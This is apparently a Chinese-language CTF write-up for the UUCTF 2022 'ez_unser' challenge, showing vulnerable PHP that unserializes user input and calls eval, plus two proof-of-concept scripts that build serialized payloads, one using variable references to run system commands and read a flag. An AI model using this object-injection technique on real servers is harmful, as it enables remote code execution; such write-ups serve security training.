NSS [UUCTF 2022 新生赛]ez_unser-阿里云开发者社区

NSS [UUCTF 2022 新生赛]ez_unser

2024-08-14 40

版权

本文内容由阿里云实名注册用户自发贡献，版权归原作者所有，阿里云开发者社区不拥有其著作权，亦不承担相应法律责任。具体规则请查看《阿里云开发者社区用户服务协议》和《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容，填写侵权投诉表单进行举报，一经查实，本社区将立刻删除涉嫌侵权内容。

简介： NSS [UUCTF 2022 新生赛]ez_unser

NSS [UUCTF 2022 新生赛]ez_unser

源码如下：

<?php
show_source(__FILE__);

###very___so___easy!!!!
class test{
    public $a;
    public $b;
    public $c;
    public function __construct(){
        $this->a=1;
        $this->b=2;
        $this->c=3;
    }
    public function __wakeup(){
        $this->a='';
    }
    public function __destruct(){
        $this->b=$this->c;
        eval($this->a);
    }
}
$a=$_GET['a'];
if(!preg_match('/test":3/i',$a)){
    die("你输入的不正确！！！搞什么！！");
}
$bbb=unserialize($_GET['a']);

一看就是要绕过__wakeup()，但是**if(!preg_match(‘/test":3/i’,$a))**要求传入的字符串包含test":3那就不能只简单的改个数字绕过weakup了。

方法一：我想玩个骚的

我使b=c=test":3 不就好了吗，然后使属性值个数大于属性个数（正常做法）

poc：

<?php
class test{
    public $a;
    public $b;
    public $c;
    public function __construct(){
        $this->a="system('ls /');";
        $this->b='test":3';
        $this->c='test":3';
    }

}
$j17=new test();
echo urlencode(serialize($j17));

但是无果。应该是php版本问题。

方法二：变量引用

不绕过weakup，把c变量改成命令，a引用b。

经过weakup后a变成空，然后b=c，a引用b，b=c(命令)。

poc：

<?php
class test{
    public $a;
    public $b;
    public $c;
    public function __construct(){

    }
    public function __wakeup(){
        $this->a='';
    }
    public function __destruct(){
        $this->b=$this->c;
        eval($this->a);
    }
}
$jay17=new test();
$jay17->b=&$jay17->a;
$jay17->c="system('tac /fffffffffflagafag');";
echo urlencode(serialize($jay17));

?>

文章标签：

PHP

NSS [UUCTF 2022 新生赛]ez_unser

NSS [UUCTF 2022 新生赛]ez_unser

热门文章

最新文章

相关电子书

热门

活动广场

任务中心

开发者评测

高校计划

乘风者计划

训练营

阿里云MVP

话题

直播

下载

镜像站

技术资料

插件

NSS [UUCTF 2022 新生赛]ez_unser

NSS [UUCTF 2022 新生赛]ez_unser

热门文章

最新文章

相关电子书